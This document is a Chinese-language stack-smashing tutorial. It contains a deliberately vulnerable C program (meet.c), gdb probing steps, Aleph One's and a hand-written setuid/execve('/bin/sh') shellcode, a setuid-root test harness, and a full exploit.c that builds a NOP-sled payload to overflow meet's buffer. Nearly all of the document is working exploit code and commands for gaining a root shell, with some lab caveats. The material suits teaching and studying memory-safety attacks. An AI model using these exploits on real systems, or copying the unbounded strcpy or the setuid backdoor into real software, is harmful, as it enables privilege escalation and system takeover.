漏洞代码 (meet.c，有漏洞的目标程序：`greeting()` 用不检查长度的 `strcpy` 把 argv[2] 复制进 400 字节的栈缓冲区 `name`，这就是后面要利用的溢出点):
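//meet.c
#include <stdio.h>
#include <string.h>

/*
 * Deliberately vulnerable target program.
 *
 * greeting() copies its second argument into a fixed 400-byte stack buffer
 * with strcpy(), which never looks at the destination size.  Any temp2 of
 * 400 bytes or more overruns name[] and clobbers whatever the compiler laid
 * out above it (saved frame pointer, return address).  This is the bug the
 * rest of the page exploits -- do NOT "fix" it if you want the walkthrough
 * to work.  The real-world fix is a bounded copy, e.g.
 * snprintf(name, sizeof name, "%s", temp2).
 *
 * temp1: printed unchanged.
 * temp2: copied into name[400] with no length check (the overflow).
 */
void greeting(char *temp1, char *temp2)
{
    char name[400];

    strcpy(name, temp2);                  /* INTENTIONAL overflow: unbounded */
    printf("Hello %s %s\n", temp1, name);
}

/*
 * Usage: ./meet <first> <second>
 *
 * Both arguments are required; the second one is the overflow vector.  The
 * argc check only avoids a NULL dereference when the program is run by hand
 * with too few arguments -- it does nothing against the overflow itself.
 */
int main(int argc, char *argv[])
{
    if (argc < 3) {
        fprintf(stderr, "usage: %s <first> <second>\n", argv[0]);
        return 1;
    }
    greeting(argv[1], argv[2]);
    printf("Bye %s %s\n", argv[1], argv[2]);
    return 0;
}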
调试语句 (编译目标程序并在 gdb 中观察溢出。实验前需关闭 ASLR；在现代工具链上通常还要加 `-m32 -fno-stack-protector -z execstack`，本页原文没有提到这些缓解措施，请按自己的环境确认):
# Build the target.  -mpreferred-stack-boundary=2 keeps the frame 4-byte aligned,
# so the layout is predictable: name[400], then the saved EBP, then the return
# address.  -ggdb keeps symbols for the session below.  On a modern toolchain you
# will most likely also need -m32 -fno-stack-protector -z execstack and ASLR
# switched off (not shown on this page -- confirm for your host).
gcc -mpreferred-stack-boundary=2 -o meet -ggdb meet.c
# Interactive gdb session: the lines below are typed at the (gdb) prompt.
gdb meet
# Show the source so a breakpoint line can be chosen.
list
# Break at source line 6 of meet.c -- in the original file layout presumably the
# printf inside greeting(), i.e. right after strcpy() has overrun the buffer.
b 6
# Argument for `run Mr <this>`: 403 'A's plus the terminating NUL is 404 bytes,
# 4 more than name[400].  Assuming the layout above, the copy overruns into the
# saved frame pointer (0x00414141) but leaves the return address untouched -- a
# first probe of the frame before the real payload is built.
`perl -e 'print "A"x403'`
aleph1 的 shellcode (Aleph One 在 "Smashing the Stack for Fun and Profit" 中给出的 Linux/x86 execve("/bin/sh") shellcode，这里在前面加了 8 字节的 setuid(0)：`31 c0 31 db b0 17 cd 80`；整段共 53 字节，不含 NUL 字节，所以能完整通过目标程序的 strcpy)
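//shellcode.c
/*
 * Aleph One's Linux/x86 shellcode from "Smashing the Stack for Fun and
 * Profit": execve("/bin/sh", ["/bin/sh", NULL], NULL) followed by exit(),
 * with 8 bytes of setuid(0) prepended (xor eax,eax; xor ebx,ebx;
 * mov al,0x17; int 0x80).  53 bytes, no NUL bytes.
 *
 * The jmp/call trick patches the string in place ("\x88\x46\x07" writes
 * the NUL that terminates "/bin/sh"), so the bytes must sit in memory that
 * is both writable and executable.
 */
char shellcode[] =
    "\x31\xc0\x31\xdb\xb0\x17\xcd\x80"                                   /* setuid(0) */
    "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
    "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
    "\x80\xe8\xdc\xff\xff\xff/bin/sh";

/*
 * Harness that transfers control to the bytes above.
 *
 * The original did this by overwriting main's own saved return address via
 * `ret = (int *)&ret + 2`, which only works when the compiler happens to put
 * the return address exactly two words above the local (32-bit, -O0, no
 * stack protector), and the (int) cast truncates the pointer on 64-bit
 * hosts.  Calling the array through a function pointer -- the technique
 * sc2.c on this page already uses -- needs none of those assumptions.  It
 * still needs an executable data page: build 32-bit and, on a modern
 * toolchain, with -z execstack (or mprotect the page RWX) -- confirm for
 * your host.
 *
 * The return statement is normally never reached: the shellcode either
 * execs a shell or calls exit() itself.
 */
int main(void)
{
    void (*run)(void) = (void (*)(void))shellcode;

    run();
    return 0;
}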
获得当前 esp 值 (用 exploit 进程自身的栈指针来估计目标进程里 `name[]` 的位置；只有在 ASLR 关闭、且两个进程的环境变量和参数大致相同时，这个估计才有参考价值，剩余的误差靠 NOP sled 吸收)
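#include <stdio.h>

/*
 * Return the current stack pointer.
 *
 * The original relied on `movl %esp,%eax` leaving the value in the return
 * register and on the function having no return statement -- undefined
 * behaviour that happens to work at -O0 on 32-bit x86 and silently
 * truncates on x86-64.  Here the asm hands the value out through an output
 * operand, so the compiler knows where it is.  Only the x86 variants give
 * the real ESP/RSP; other architectures fall back to the address of a
 * local, which is on the stack and close enough for a starting guess.
 */
unsigned long get_sp(void)
{
    unsigned long sp;

#if defined(__i386__)
    __asm__ volatile ("movl %%esp, %0" : "=r"(sp));
#elif defined(__x86_64__)
    __asm__ volatile ("movq %%rsp, %0" : "=r"(sp));
#else
    sp = (unsigned long)&sp;            /* no inline asm for this arch: approximate */
#endif
    return sp;
}

/* Print the stack pointer; %lx matches the unsigned long (the old %x did not). */
int main(void)
{
    printf("Stack pointer(ESP):0x%lx\n", get_sp());
    return 0;
}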
# Dump Aleph One's setuid(0) + execve("/bin/sh") shellcode (53 bytes) into the
# file `sc` as raw bytes.  No trailing newline: the file is spliced verbatim
# into the target's argv[2] below.
perl -e 'print "\x31\xc0\x31\xdb\xb0\x17\xcd\x80\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh";' > sc

# Payload for meet's name[400]: 203 NOPs + 53 bytes of shellcode = 256 bytes,
# then the guessed return address 0xbffff588 (little-endian) repeated 89 times
# (356 bytes), 612 bytes in total.  Because 256 is a multiple of 4, every copy
# of the address is 4-byte aligned relative to the buffer, so the one that lands
# on the saved return address (name+404 in the -mpreferred-stack-boundary=2
# build) is a whole word.  0xbffff588 is the value from the author's machine --
# it will differ elsewhere, and ASLR must be off for any fixed guess to work.
nops=$(perl -e 'print "\x90"x203')
ret=$(perl -e 'print "\x88\xf5\xff\xbf"x89')
./meet Mr "${nops}$(cat sc)${ret}"
编写自己的shellcode
1.编写汇编
BITS 32

section .text
global _start

_start:
    ; setreuid(0, 0): syscall 0x46 on Linux/i386, ebx = ruid, ecx = euid.
    ; eax is zeroed first so only AL carries the syscall number -- the
    ; encodings stay free of NUL bytes, which a strcpy()-based overflow
    ; would truncate on.
    xor     eax, eax
    mov     al, 0x46
    xor     ebx, ebx
    xor     ecx, ecx
    int     0x80

    ; execve("/bin//sh", ["/bin//sh", NULL], NULL): syscall 0xb.
    ; The path is built on the stack in reverse: NUL, then "//sh", then
    ; "/bin", so it reads forward as "/bin//sh\0" (the doubled slash pads
    ; the string to two whole dwords without needing a NUL byte).
    xor     eax, eax
    push    eax                 ; "\0"
    push    0x68732f2f          ; "//sh"
    push    0x6e69622f          ; "/bin"
    mov     ebx, esp            ; ebx = path
    push    eax                 ; argv[1] = NULL
    push    ebx                 ; argv[0] = path
    mov     ecx, esp            ; ecx = argv
    xor     edx, edx            ; edx = envp = NULL
    mov     al, 0xb
    int     0x80
2.生成可执行文件
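# Assemble as a 32-bit ELF object (the code uses int 0x80 and 32-bit registers).
nasm -f elf32 sc.asm
# Link for i386.  -m elf_i386 is the default on a 32-bit host and is required on
# an x86-64 host, where ld would otherwise reject the 32-bit object
# ("i386 architecture of input file is incompatible with i386:x86-64 output").
ld -m elf_i386 -o sc sc.o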
3.提取十六进制代码
# Disassemble the linked binary; the opcode bytes in the middle column are what
# gets pasted into the C array in sc2.c.
objdump --disassemble ./sc
[root@localhost root]# objdump -d ./sc ./sc: file format elf32-i386 Disassembly of section .text: 08048080 <_start>: 8048080: 31 c0 xor %eax,%eax 8048082: b0 46 mov $0x46,%al 8048084: 31 db xor %ebx,%ebx 8048086: 31 c9 xor %ecx,%ecx 8048088: cd 80 int $0x80 804808a: 31 c0 xor %eax,%eax 804808c: 50 push %eax 804808d: 68 2f 2f 73 68 push $0x68732f2f 8048092: 68 2f 62 69 6e push $0x6e69622f 8048097: 89 e3 mov %esp,%ebx 8048099: 50 push %eax 804809a: 53 push %ebx 804809b: 89 e1 mov %esp,%ecx 804809d: 31 d2 xor %edx,%edx 804809f: b0 0b mov $0xb,%al 80480a1: cd 80 int $0x80
4.放到程序里面测试shellcode
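//sc2.c
/*
 * Test harness for the hand-written shellcode from sc.asm.  The bytes are the
 * ones `objdump -d sc` printed for each instruction; the comments give the
 * mapping.  Nothing in the array is a NUL byte.
 */
char sc[] =
    "\x31\xc0"              /* xor   eax,eax                     */
    "\xb0\x46"              /* mov   al,0x46      setreuid(0,0)  */
    "\x31\xdb"              /* xor   ebx,ebx                     */
    "\x31\xc9"              /* xor   ecx,ecx                     */
    "\xcd\x80"              /* int   0x80                        */
    "\x31\xc0"              /* xor   eax,eax                     */
    "\x50"                  /* push  eax          "\0"           */
    "\x68\x2f\x2f\x73\x68"  /* push  "//sh"                      */
    "\x68\x2f\x62\x69\x6e"  /* push  "/bin"                      */
    "\x89\xe3"              /* mov   ebx,esp      path           */
    "\x50"                  /* push  eax          argv[1] = NULL */
    "\x53"                  /* push  ebx          argv[0]        */
    "\x89\xe1"              /* mov   ecx,esp      argv           */
    "\x31\xd2"              /* xor   edx,edx      envp = NULL    */
    "\xb0\x0b"              /* mov   al,0xb       execve         */
    "\xcd\x80";             /* int   0x80                        */

/*
 * Jump into the byte array.  The cast goes straight to a function pointer;
 * the old detour through (void *) was an object-to-function pointer
 * conversion that ISO C does not define.  The page holding sc[] must be
 * executable: build 32-bit and, on a modern toolchain, with -z execstack
 * (or mprotect it RWX) -- confirm for your host.  The return is only
 * reached if the shellcode's execve fails.
 */
int main(void)
{
    void (*fp)(void) = (void (*)(void))sc;

    fp();
    return 0;
}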
5.设置 SUID 并执行 (把 sc2 变成 setuid-root 程序，以验证 shellcode 确实能拿到 root shell。务必只在一次性实验环境中操作，验证完立即删除 sc2，否则机器上就留下了一个任何本地用户都能拿 root 的后门)
# Make the harness setuid root.  ug+s is what a bare +s expands to: both the
# set-user-ID and set-group-ID bits.  setreuid(0,0) inside the shellcode then
# makes the real uid 0 as well, so the spawned /bin/sh keeps root instead of
# dropping it.  This leaves a root backdoor on disk -- remove ./sc2 when done.
sudo chown root ./sc2
sudo chmod ug+s ./sc2
./sc2
通用 exploit 代码 (把 NOP sled、shellcode 和猜测的返回地址按参数拼成 payload，再用 execl 启动 ./meet；缓冲区大小、偏移和 esp 都可以从命令行调整)
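//exploit.c
#include <errno.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

/*
 * Aleph One's Linux/x86 shellcode (execve("/bin/sh"), then exit()), 53 bytes,
 * prefixed with 8 bytes of setuid(0) (xor eax,eax; xor ebx,ebx; mov al,0x17;
 * int 0x80).  It contains no NUL bytes, so all of it survives meet's strcpy().
 */
char shellcode[] =
    //setuid(0)
    "\x31\xc0\x31\xdb\xb0\x17\xcd\x80"
    "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
    "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
    "\x80\xe8\xdc\xff\xff\xff/bin/sh";

/*
 * Current stack pointer of this process.  It is only a starting guess for
 * where meet's name[] will sit: the two processes start with a similar
 * environment, so their stacks tend to be close when ASLR is off, and the
 * NOP sled absorbs the remaining error.  The value is read through an asm
 * output operand instead of relying on EAX happening to be the return
 * register (the original had no return statement at all).
 */
unsigned long get_sp(void)
{
    unsigned long sp;

#if defined(__i386__)
    __asm__ volatile ("movl %%esp, %0" : "=r"(sp));
#elif defined(__x86_64__)
    /* The target is 32-bit; this is only meaningful for a -m32 build. */
    __asm__ volatile ("movq %%rsp, %0" : "=r"(sp));
#else
    sp = (unsigned long)&sp;            /* no inline asm for this arch: approximate */
#endif
    return sp;
}

/*
 * Parse a base-10 integer argument.  On garbage or overflow it prints a
 * message and exits instead of silently yielding 0 the way atoi() did
 * (a size of 0 would have indexed buffer[-1]).
 */
static long parse_dec(const char *s, const char *what)
{
    char *end;
    long v;

    errno = 0;
    v = strtol(s, &end, 10);
    if (end == s || *end != '\0' || errno == ERANGE) {
        fprintf(stderr, "bad %s: '%s'\n", what, s);
        exit(1);
    }
    return v;
}

/*
 * Usage: exploit [buff_size] [offset] [esp]
 *
 * Builds a payload of buff_size bytes (default 500) and passes it to ./meet
 * as argv[2]:
 *   [0, size/2)           NOP sled (0x90)
 *   [size/2, size/2+53)   shellcode
 *   everything else       the guessed return address (esp - offset), stored
 *                         as 4-byte little-endian words at offsets that are
 *                         multiples of 4, so the word that lands on meet's
 *                         saved return address (name+404 in the
 *                         -mpreferred-stack-boundary=2 build shown earlier)
 *                         is whole and aligned
 *   [size-1]              NUL so execl() sees a proper C string
 *
 * The word fill stops at the last whole word, so a size that is not a
 * multiple of 4 is effectively rounded down; the original wrote a full
 * long past the end of the malloc'd buffer in that case.  Addresses are
 * 4-byte uint32_t, not long, so the layout is the same on a 64-bit host
 * (though the whole chain only makes sense built 32-bit, like meet).
 */
int main(int argc, char *argv[])
{
    long size = 500;
    long offset = 0;
    unsigned long esp = get_sp();
    uint32_t ret;
    size_t sc_len = strlen(shellcode);
    unsigned char *buffer;
    size_t i;

    if (argc > 1)
        size = parse_dec(argv[1], "buff_size");
    if (argc > 2)
        offset = parse_dec(argv[2], "offset");
    if (argc > 3)
        esp = strtoul(argv[3], NULL, 0);

    /* The shellcode plus its NUL must fit after the sled. */
    if (size < 8 || (size_t)size < (size_t)(size / 2) + sc_len + 1) {
        fprintf(stderr, "buff_size %ld is too small for a %zu-byte shellcode\n",
                size, sc_len);
        return 1;
    }
    ret = (uint32_t)(esp - (unsigned long)offset);

    fprintf(stderr, "Usage:%s<buff_size><offset><esp:0xfff...>\n", argv[0]);
    fprintf(stderr, "ESP:0x%lx Offset:0x%lx Return:0x%lx\n",
            esp, (unsigned long)offset, (unsigned long)ret);

    /* calloc: any tail bytes after the last whole word are NUL, not garbage. */
    buffer = calloc((size_t)size, 1);
    if (buffer == NULL) {
        perror("calloc");
        return 1;
    }
    for (i = 0; i + sizeof ret <= (size_t)size; i += sizeof ret)
        memcpy(buffer + i, &ret, sizeof ret);      /* host (x86) byte order */
    memset(buffer, 0x90, (size_t)size / 2);
    memcpy(buffer + size / 2, shellcode, sc_len);
    buffer[size - 1] = '\0';

    /* The argument list must end in a char* NULL, not a bare 0 (varargs). */
    execl("./meet", "meet", "Mr.", (char *)buffer, (char *)NULL);

    /* Only reached when the exec itself failed. */
    perror("execl ./meet");
    free(buffer);
    return 1;
}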